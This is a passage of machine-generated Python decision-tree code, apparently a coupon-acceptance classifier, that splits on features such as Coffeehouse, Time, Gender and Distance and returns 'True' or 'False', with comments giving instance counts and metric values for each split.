else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
# {"feature": "Coffeehouse", "instances": 10, "metric_value": 0.2857, "depth": 10}
if obj[9]>0.0:
# {"feature": "Time", "instances": 7, "metric_value": 0.3714, "depth": 11}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.3, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[3]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[9]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]<=0:
# {"feature": "Occupation", "instances": 24, "metric_value": 0.3175, "depth": 8}
if obj[7]>1:
# {"feature": "Coffeehouse", "instances": 21, "metric_value": 0.3439, "depth": 9}
if obj[9]>-1.0:
# {"feature": "Distance", "instances": 18, "metric_value": 0.3861, "depth": 10}
if obj[12]>1:
# {"feature": "Time", "instances": 10, "metric_value": 0.2857, "depth": 11}
if obj[1]<=3:
# {"feature": "Gender", "instances": 7, "metric_value": 0.381, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Time", "instances": 8, "metric_value": 0.4375, "depth": 11}
if obj[1]>2:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=2:
# {"feature": "Gender", "instances": 4, "metric_value": 0.25, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=-1.0:
return 'True'
else: return 'True'
elif obj[7]<=1:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[6]>1:
# {"feature": "Gender", "instances": 294, "metric_value": 0.4196, "depth": 6}
if obj[3]>0:
# {"feature": "Distance", "instances": 149, "metric_value": 0.3531, "depth": 7}
if obj[12]<=2:
# {"feature": "Occupation", "instances": 121, "metric_value": 0.3842, "depth": 8}
if obj[7]>1:
# {"feature": "Time", "instances": 92, "metric_value": 0.4354, "depth": 9}
if obj[1]>0:
# {"feature": "Age", "instances": 63, "metric_value": 0.3917, "depth": 10}
if obj[4]<=6:
# {"feature": "Coffeehouse", "instances": 62, "metric_value": 0.3867, "depth": 11}
if obj[9]<=1.0:
# {"feature": "Passanger", "instances": 34, "metric_value": 0.32, "depth": 12}
if obj[0]>0:
# {"feature": "Direction_same", "instances": 28, "metric_value": 0.2911, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[0]<=0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>1.0:
# {"feature": "Direction_same", "instances": 28, "metric_value": 0.4497, "depth": 12}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 27, "metric_value": 0.463, "depth": 13}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>6:
return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Age", "instances": 29, "metric_value": 0.4496, "depth": 10}
if obj[4]<=5:
# {"feature": "Direction_same", "instances": 27, "metric_value": 0.4392, "depth": 11}
if obj[11]<=0:
# {"feature": "Coffeehouse", "instances": 17, "metric_value": 0.3832, "depth": 12}
if obj[9]>1.0:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.4762, "depth": 13}
if obj[0]<=0:
return 'False'
elif obj[0]>0:
return 'False'
else: return 'False'
elif obj[9]<=1.0:
# {"feature": "Passanger", "instances": 7, "metric_value": 0.2381, "depth": 13}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Coffeehouse", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[9]>1.0:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[0]<=1:
return 'False'
else: return 'False'
elif obj[9]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>5:
return 'True'
else: return 'True'
else: return 'False'
elif obj[7]<=1:
# {"feature": "Age", "instances": 29, "metric_value": 0.1352, "depth": 9}
if obj[4]<=6:
# {"feature": "Passanger", "instances": 25, "metric_value": 0.06, "depth": 10}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[1]>0:
# {"feature": "Coffeehouse", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[9]<=0.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>6:
# {"feature": "Passanger", "instances": 4, "metric_value": 0.0, "depth": 10}
if obj[0]>1:
return 'True'
elif obj[0]<=1:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[12]>2:
# {"feature": "Coffeehouse", "instances": 28, "metric_value": 0.1209, "depth": 8}
if obj[9]<=1.0:
return 'False'
elif obj[9]>1.0:
# {"feature": "Time", "instances": 13, "metric_value": 0.2168, "depth": 9}
if obj[1]>0:
# {"feature": "Age", "instances": 11, "metric_value": 0.1212, "depth": 10}
if obj[4]<=2:
return 'False'
elif obj[4]>2:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[7]>1:
# {"feature": "Passanger", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Age", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[4]<=0:
return 'True'
elif obj[4]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 145, "metric_value": 0.457, "depth": 7}
if obj[9]<=1.0:
# {"feature": "Occupation", "instances": 106, "metric_value": 0.4315, "depth": 8}
if obj[7]<=8:
# {"feature": "Age", "instances": 61, "metric_value": 0.4659, "depth": 9}
if obj[4]>0:
# {"feature": "Distance", "instances": 48, "metric_value": 0.4238, "depth": 10}
if obj[12]>1:
# {"feature": "Time", "instances": 31, "metric_value": 0.3752, "depth": 11}
if obj[1]<=2:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.3977, "depth": 12}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 22, "metric_value": 0.4273, "depth": 13}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.1429, "depth": 12}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
# {"feature": "Passanger", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[0]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Time", "instances": 17, "metric_value": 0.4941, "depth": 11}
if obj[1]>0:
# {"feature": "Passanger", "instances": 12, "metric_value": 0.4857, "depth": 12}
if obj[0]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4898, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[0]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Time", "instances": 13, "metric_value": 0.3538, "depth": 10}
if obj[1]<=2:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.2143, "depth": 11}
if obj[0]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.1905, "depth": 12}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[12]<=1:
return 'False'
elif obj[12]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=0:
return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[0]<=1:
# {"feature": "Distance", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]<=1:
return 'False'
else: return 'False'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>8:
# {"feature": "Passanger", "instances": 45, "metric_value": 0.3145, "depth": 9}
if obj[0]<=1:
# {"feature": "Age", "instances": 39, "metric_value": 0.2815, "depth": 10}
if obj[4]>1:
# {"feature": "Time", "instances": 25, "metric_value": 0.3575, "depth": 11}
if obj[1]<=1:
# {"feature": "Distance", "instances": 18, "metric_value": 0.3897, "depth": 12}
if obj[12]<=2:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.3538, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[12]>2:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.2381, "depth": 12}
if obj[12]<=1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=1:
# {"feature": "Time", "instances": 14, "metric_value": 0.1071, "depth": 11}
if obj[1]<=2:
return 'False'
elif obj[1]>2:
# {"feature": "Distance", "instances": 4, "metric_value": 0.3333, "depth": 12}
if obj[12]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Age", "instances": 6, "metric_value": 0.2222, "depth": 10}
if obj[4]<=2:
return 'True'
elif obj[4]>2:
# {"feature": "Time", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[1]<=3:
return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[9]>1.0:
# {"feature": "Age", "instances": 39, "metric_value": 0.4487, "depth": 8}
if obj[4]>0:
# {"feature": "Occupation", "instances": 36, "metric_value": 0.4609, "depth": 9}
if obj[7]>1:
# {"feature": "Distance", "instances": 27, "metric_value": 0.4431, "depth": 10}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.4044, "depth": 11}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 16, "metric_value": 0.4167, "depth": 12}
if obj[0]>0:
# {"feature": "Time", "instances": 15, "metric_value": 0.4286, "depth": 13}
if obj[1]<=3:
return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[0]<=0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.3111, "depth": 11}
if obj[0]<=1:
# {"feature": "Time", "instances": 9, "metric_value": 0.3333, "depth": 12}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2667, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
return 'True'
else: return 'True'
else: return 'False'
elif obj[7]<=1:
# {"feature": "Time", "instances": 9, "metric_value": 0.2963, "depth": 10}
if obj[1]>0:
# {"feature": "Distance", "instances": 6, "metric_value": 0.4, "depth": 11}
if obj[12]>1:
# {"feature": "Passanger", "instances": 5, "metric_value": 0.4667, "depth": 12}
if obj[0]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[0]>1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[12]<=1:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
# {"feature": "Age", "instances": 207, "metric_value": 0.49, "depth": 5}
if obj[4]<=2:
# {"feature": "Coffeehouse", "instances": 107, "metric_value": 0.4728, "depth": 6}
if obj[9]<=3.0:
# {"feature": "Occupation", "instances": 98, "metric_value": 0.4645, "depth": 7}
if obj[7]<=6:
# {"feature": "Time", "instances": 56, "metric_value": 0.4362, "depth": 8}
if obj[1]<=3:
# {"feature": "Passanger", "instances": 50, "metric_value": 0.4174, "depth": 9}
if obj[0]>0:
# {"feature": "Distance", "instances": 46, "metric_value": 0.4451, "depth": 10}
if obj[12]>1:
# {"feature": "Direction_same", "instances": 30, "metric_value": 0.4, "depth": 11}
if obj[11]<=0:
# {"feature": "Education", "instances": 27, "metric_value": 0.44, "depth": 12}
if obj[6]>0:
# {"feature": "Gender", "instances": 25, "metric_value": 0.435, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Education", "instances": 16, "metric_value": 0.4409, "depth": 11}
if obj[6]>1:
# {"feature": "Gender", "instances": 11, "metric_value": 0.4481, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4857, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.3333, "depth": 13}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.2667, "depth": 9}
if obj[0]<=1:
# {"feature": "Distance", "instances": 5, "metric_value": 0.0, "depth": 10}
if obj[12]<=1:
return 'True'
elif obj[12]>1:
return 'False'
else: return 'False'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>6:
# {"feature": "Gender", "instances": 42, "metric_value": 0.4505, "depth": 8}
if obj[3]>0:
# {"feature": "Education", "instances": 26, "metric_value": 0.4573, "depth": 9}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 18, "metric_value": 0.4148, "depth": 10}
if obj[11]<=0:
# {"feature": "Time", "instances": 15, "metric_value": 0.4405, "depth": 11}
if obj[1]<=1:
# {"feature": "Passanger", "instances": 8, "metric_value": 0.4286, "depth": 12}
if obj[0]>0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.4762, "depth": 13}
if obj[12]<=2:
return 'True'
elif obj[12]>2:
return 'False'
else: return 'False'
elif obj[0]<=0:
return 'False'
else: return 'False'
elif obj[1]>1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.381, "depth": 12}
if obj[12]<=1:
# {"feature": "Passanger", "instances": 6, "metric_value": 0.4167, "depth": 13}
if obj[0]<=0:
return 'True'
elif obj[0]>0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Distance", "instances": 8, "metric_value": 0.2143, "depth": 10}
if obj[12]<=2:
# {"feature": "Time", "instances": 7, "metric_value": 0.1429, "depth": 11}
if obj[1]<=3:
return 'True'
elif obj[1]>3:
# {"feature": "Passanger", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[0]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[12]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Passanger", "instances": 16, "metric_value": 0.3, "depth": 9}
if obj[0]<=1:
# {"feature": "Time", "instances": 15, "metric_value": 0.28, "depth": 10}
if obj[1]<=2:
# {"feature": "Education", "instances": 10, "metric_value": 0.1333, "depth": 11}
if obj[6]>0:
return 'True'
elif obj[6]<=0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.0, "depth": 12}
if obj[12]<=2:
return 'True'
elif obj[12]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>2:
# {"feature": "Distance", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[12]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[6]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]>0:
return 'False'
else: return 'False'
elif obj[12]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[9]>3.0:
# {"feature": "Passanger", "instances": 9, "metric_value": 0.1481, "depth": 7}
if obj[0]>0:
return 'False'
elif obj[0]<=0:
# {"feature": "Time", "instances": 3, "metric_value": 0.3333, "depth": 8}
if obj[1]<=2:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 9}
if obj[3]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[6]<=3:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[7]<=20:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>2:
# {"feature": "Gender", "instances": 100, "metric_value": 0.4744, "depth": 6}
if obj[3]>0:
# {"feature": "Passanger", "instances": 50, "metric_value": 0.4681, "depth": 7}
if obj[0]<=2:
# {"feature": "Distance", "instances": 47, "metric_value": 0.4617, "depth": 8}
if obj[12]>1:
# {"feature": "Coffeehouse", "instances": 30, "metric_value": 0.4159, "depth": 9}
if obj[9]>1.0:
# {"feature": "Education", "instances": 22, "metric_value": 0.3409, "depth": 10}
if obj[6]<=0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.4038, "depth": 11}
if obj[11]<=0:
# {"feature": "Occupation", "instances": 13, "metric_value": 0.4487, "depth": 12}
if obj[7]>1:
# {"feature": "Time", "instances": 12, "metric_value": 0.4792, "depth": 13}
if obj[1]>0:
return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[7]<=1:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[6]>0:
return 'False'
else: return 'False'
elif obj[9]<=1.0:
# {"feature": "Time", "instances": 8, "metric_value": 0.3667, "depth": 10}
if obj[1]>0:
# {"feature": "Occupation", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[7]>1:
return 'True'
elif obj[7]<=1:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[7]<=2:
return 'False'
elif obj[7]>2:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[12]<=1:
# {"feature": "Occupation", "instances": 17, "metric_value": 0.3899, "depth": 9}
if obj[7]>1:
# {"feature": "Time", "instances": 10, "metric_value": 0.3, "depth": 10}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2143, "depth": 11}
if obj[11]<=0:
# {"feature": "Education", "instances": 7, "metric_value": 0.1429, "depth": 12}
if obj[6]<=0:
return 'True'
elif obj[6]>0:
# {"feature": "Coffeehouse", "instances": 2, "metric_value": 0.0, "depth": 13}
if obj[9]<=0.0:
return 'True'
elif obj[9]>0.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[7]<=1:
# {"feature": "Coffeehouse", "instances": 7, "metric_value": 0.3429, "depth": 10}
if obj[9]<=2.0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[1]<=1:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[6]>1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=1:
return 'True'
else: return 'True'
elif obj[6]<=1:
return 'False'
else: return 'False'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[0]>2:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Education", "instances": 50, "metric_value": 0.4162, "depth": 7}
if obj[6]>0:
# {"feature": "Coffeehouse", "instances": 27, "metric_value": 0.3085, "depth": 8}
if obj[9]>1.0:
# {"feature": "Passanger", "instances": 17, "metric_value": 0.1412, "depth": 9}
if obj[0]>0:
return 'True'
elif obj[0]<=0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[1]>0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[7]>2:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[12]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=2:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=1.0:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.4, "depth": 9}
if obj[0]<=1:
# {"feature": "Time", "instances": 9, "metric_value": 0.381, "depth": 10}
if obj[1]<=1:
# {"feature": "Distance", "instances": 7, "metric_value": 0.3429, "depth": 11}
if obj[12]<=2:
# {"feature": "Occupation", "instances": 5, "metric_value": 0.3, "depth": 12}
if obj[7]>6:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.25, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[7]<=6:
return 'True'
else: return 'True'
elif obj[12]>2:
return 'True'
else: return 'True'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[0]>1:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Distance", "instances": 23, "metric_value": 0.4101, "depth": 8}
if obj[12]<=2:
# {"feature": "Passanger", "instances": 17, "metric_value": 0.4235, "depth": 9}
if obj[0]<=1:
# {"feature": "Coffeehouse", "instances": 15, "metric_value": 0.44, "depth": 10}
if obj[9]<=1.0:
# {"feature": "Time", "instances": 10, "metric_value": 0.4444, "depth": 11}
if obj[1]<=3:
# {"feature": "Occupation", "instances": 9, "metric_value": 0.381, "depth": 12}
if obj[7]>5:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4857, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[7]<=5:
return 'False'
else: return 'False'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[9]>1.0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[1]>0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[7]<=7:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>1:
return 'True'
else: return 'True'
elif obj[12]>2:
# {"feature": "Time", "instances": 6, "metric_value": 0.1667, "depth": 9}
if obj[1]>0:
return 'False'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[7]>7:
return 'True'
elif obj[7]<=7:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Restaurant20to50", "instances": 680, "metric_value": 0.4641, "depth": 3}
if obj[10]<=1.0:
# {"feature": "Time", "instances": 365, "metric_value": 0.4856, "depth": 4}
if obj[1]>0:
# {"feature": "Passanger", "instances": 267, "metric_value": 0.4792, "depth": 5}
if obj[0]<=2:
# {"feature": "Occupation", "instances": 207, "metric_value": 0.4675, "depth": 6}
if obj[7]<=14.155999220544217:
# {"feature": "Distance", "instances": 174, "metric_value": 0.4853, "depth": 7}
if obj[12]<=2:
# {"feature": "Age", "instances": 128, "metric_value": 0.4792, "depth": 8}
if obj[4]<=4:
# {"feature": "Coffeehouse", "instances": 120, "metric_value": 0.4839, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Education", "instances": 75, "metric_value": 0.4876, "depth": 10}
if obj[6]>1:
# {"feature": "Children", "instances": 42, "metric_value": 0.4937, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 30, "metric_value": 0.4643, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 28, "metric_value": 0.4949, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 12, "metric_value": 0.3333, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4286, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Gender", "instances": 33, "metric_value": 0.4563, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.362, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 13, "metric_value": 0.4573, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.4667, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 15, "metric_value": 0.4786, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[9]>2.0:
# {"feature": "Education", "instances": 45, "metric_value": 0.4387, "depth": 10}
if obj[6]>0:
# {"feature": "Children", "instances": 34, "metric_value": 0.4673, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 23, "metric_value": 0.4306, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 21, "metric_value": 0.4694, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3409, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[3]<=0:
return 'True'
